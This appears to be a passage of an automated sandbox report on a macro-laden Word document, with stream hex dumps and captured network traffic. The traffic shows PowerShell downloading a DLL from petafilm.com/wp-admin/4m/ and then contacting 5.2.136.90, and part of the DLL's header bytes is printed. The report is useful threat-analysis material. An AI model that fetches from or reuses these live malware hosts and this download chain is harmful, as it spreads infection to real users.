Data Raw:	49 44 3d 22 7b 33 32 38 34 30 34 45 46 2d 34 31 36 43 2d 34 44 45 38 2d 39 41 34 32 2d 32 30 31 35 36 44 32 32 32 43 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6d 5f 74 34 30 34 70 38 76 5f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 51 61 66 6b 72 69 6d 77 73 68 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 69 35 6f 65 6c 76 30 5f 73 34 0d 0a 45 78 65 4e 61 6d 65 33 32 3d

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	110
Entropy:	3.60650024781
Base64 Encoded:	False
Data ASCII:	W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
Data Raw:	57 6d 5f 74 34 30 34 70 38 76 5f 00 57 00 6d 00 5f 00 74 00 34 00 30 00 34 00 70 00 38 00 76 00 5f 00 00 00 51 61 66 6b 72 69 6d 77 73 68 6f 00 51 00 61 00 66 00 6b 00 72 00 69 00 6d 00 77 00 73 00 68 00 6f 00 00 00 4f 69 35 6f 65 6c 76 30 5f 73 34 00 4f 00 69 00 35 00 6f 00 65 00 6c 00 76 00 30 00 5f 00 73 00 34 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5146
Entropy:	5.51240945881
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	630
Entropy:	6.3062184781
Base64 Encoded:	True
Data ASCII:	. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
Data Raw:	01 72 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 08 e2 e3 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 25134

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	25134
Entropy:	3.92042329439
Base64 Encoded:	False
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . Y \\ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . b . . . b . . . Y T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 59 5c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 62 00 00 62 7f 00 00 62 7f 00 00 59 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2021 08:49:13.615979910 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.693485022 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.693684101 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.699331999 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.808119059 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808175087 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808206081 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808227062 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.808237076 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808267117 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808280945 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.808304071 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808339119 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808341026 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.808373928 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808407068 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808409929 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.808442116 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.808479071 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882118940 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882172108 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882200956 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882222891 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882225037 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882266045 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882276058 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882293940 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882318974 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882334948 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882344961 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882373095 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882381916 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882401943 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882426023 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882437944 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882450104 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882467031 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882493973 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882496119 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882524014 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882535934 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882548094 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882575989 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882590055 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882601023 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882623911 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882648945 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.882654905 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.882695913 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957150936 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957180977 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957206964 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957227945 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957248926 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957263947 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957289934 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957308054 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957307100 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957324982 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957349062 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957354069 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957357883 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957380056 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957415104 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957437038 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957437038 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957457066 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957479954 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957479954 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957505941 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957521915 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957525969 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957549095 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957564116 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957570076 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957590103 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957607031 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957612038 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957633018 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957647085 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957653046 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957676888 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957688093 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957700968 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957726002 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957741022 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957751989 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957776070 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957792044 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957801104 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957825899 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957849979 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957858086 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957875967 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957889080 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957902908 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957926989 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957946062 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.957952023 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957977057 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.957992077 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.958002090 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.958025932 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.958043098 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.958051920 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.958076954 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:13.958095074 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:13.960755110 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.031620979 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031727076 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031745911 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031816959 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031836033 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031836987 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.031862020 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031881094 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.031888008 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031909943 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.031929970 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031949043 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031970024 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.031975985 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.031994104 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032016039 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032021999 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032046080 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032064915 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032068968 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032094955 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032115936 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032119036 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032141924 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032156944 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032162905 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032182932 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032202005 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032202959 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032229900 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032243967 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032254934 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032283068 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032304049 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032327890 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032351971 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032375097 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032394886 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032407045 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032407999 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032418966 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032432079 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032455921 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032476902 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032485008 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032497883 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032501936 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032521963 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032545090 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032546043 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032569885 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032588959 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032592058 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032613039 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032632113 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032636881 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032661915 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032680988 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032686949 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032707930 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032727003 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.032732964 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.032788038 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.034205914 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.034233093 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.034260988 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.034286976 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.034296036 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.034327984 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106429100 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106458902 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106470108 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106482029 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106496096 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106523037 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106549025 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106569052 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106585026 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106609106 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106637955 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106641054 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106659889 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106679916 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106683969 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106698036 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106698990 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106709957 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106725931 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106751919 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106774092 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106777906 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106791019 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106801987 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106817007 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106843948 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106843948 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106863976 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106889963 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106889963 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106914043 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106931925 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106940031 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.106960058 CET	80	49167	176.53.69.151	192.168.2.22
Jan 6, 2021 08:49:14.106987000 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.310667038 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:14.796241045 CET	49167	80	192.168.2.22	176.53.69.151
Jan 6, 2021 08:49:32.515635967 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:32.587188005 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:32.587295055 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:32.588160992 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:32.588224888 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:32.660058975 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:32.660144091 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:32.733081102 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:32.733161926 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:32.805114031 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:33.304199934 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:33.304248095 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:33.304442883 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:49:33.376061916 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:33.376100063 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:49:33.376211882 CET	49168	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:50:38.299807072 CET	80	49168	5.2.136.90	192.168.2.22
Jan 6, 2021 08:50:38.300043106 CET	49168	80	192.168.2.22	5.2.136.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2021 08:49:13.475481987 CET	52197	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:49:13.579385996 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 6, 2021 08:49:13.475481987 CET	192.168.2.22	8.8.8.8	0x80ac	Standard query (0)	petafilm.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 6, 2021 08:49:13.579385996 CET	8.8.8.8	192.168.2.22	0x80ac	No error (0)	petafilm.com		176.53.69.151	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

petafilm.com

5.2.136.90

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	176.53.69.151	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:49:13.699331999 CET	0	OUT	GET /wp-admin/4m/ HTTP/1.1 Host: petafilm.com Connection: Keep-Alive
Jan 6, 2021 08:49:13.808119059 CET	1	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: application/octet-stream Expires: Wed, 06 Jan 2021 07:49:24 GMT Last-Modified: Wed, 06 Jan 2021 07:49:24 GMT Server: Microsoft-IIS/10.0 Set-Cookie: 5ff56b8489beb=1609919364; expires=Wed, 06-Jan-2021 07:50:24 GMT; Max-Age=60; path=/ Content-Disposition: attachment; filename="QieaYu0XHj8.dll" Content-Transfer-Encoding: binary X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Wed, 06 Jan 2021 07:49:23 GMT Content-Length: 192000 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 